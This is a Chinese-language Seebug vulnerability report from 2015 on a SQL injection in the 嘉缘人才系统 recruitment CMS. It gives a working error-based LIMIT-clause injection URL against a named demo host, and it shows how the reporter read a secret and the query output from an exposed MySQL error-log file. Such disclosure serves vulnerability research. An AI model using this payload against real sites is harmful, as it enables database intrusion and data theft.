嘉缘人才系统sql注入(demo测试成功,limit注入实例)

2015-03-13T00:00:00
ID SSV:94662
Type seebug
Reporter Root
Modified 2015-03-13T00:00:00

Description

简要描述:

rt

详细说明:

直接黑盒发现

http://v2014.rccms.com/person/resumelist.php?t=sideline&pnum=

其中pnum为可控,随意输入一个字符发现mysql报错

<img src="https://images.seebug.org/upload/201503/12195242bc5029d39e7e0b104532c02379e4940f.png" alt="18.png" width="600" onerror="javascript:errimg(this);">

这个cms会把报错信息存在一个日志文件,如何获取这个日志文件,在前面发的洞中有详细的说明 WooYun: 嘉缘人才系统最新版sql注入(直接出数据) 首先我们来获取$cfg['cookie_encode']

<img src="https://images.seebug.org/upload/201503/121955463edf4d6282aec9265ca2aca337d20456.png" alt="19.png" width="600" onerror="javascript:errimg(this);">

把上面标注的base64解密,得到testUzEZa4962Q,其中test为我的用户名。 然后

UzEZa4962Q

就为$cfg['cookie_encode']。好了,找到之后,我们来构造poc 根据http://zone.wooyun.org/content/18220提供的方法 构造以下poc

http://v2014.rccms.com/person/resumelist.php?t=sideline&pnum=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,user())),1)

然后访问mysql错误记录文件

http://v2014.rccms.com/data/log/sql_6ecd87d0e5e1bd5ecc321bd2e1246e39.txt

可以看到直接出数据了。

<img src="https://images.seebug.org/upload/201503/121959575a23efe4b1f03fa7c0e82992ce9d6b3f.png" alt="20.png" width="600" onerror="javascript:errimg(this);">

漏洞证明:

<img src="https://images.seebug.org/upload/201503/121959575a23efe4b1f03fa7c0e82992ce9d6b3f.png" alt="20.png" width="600" onerror="javascript:errimg(this);">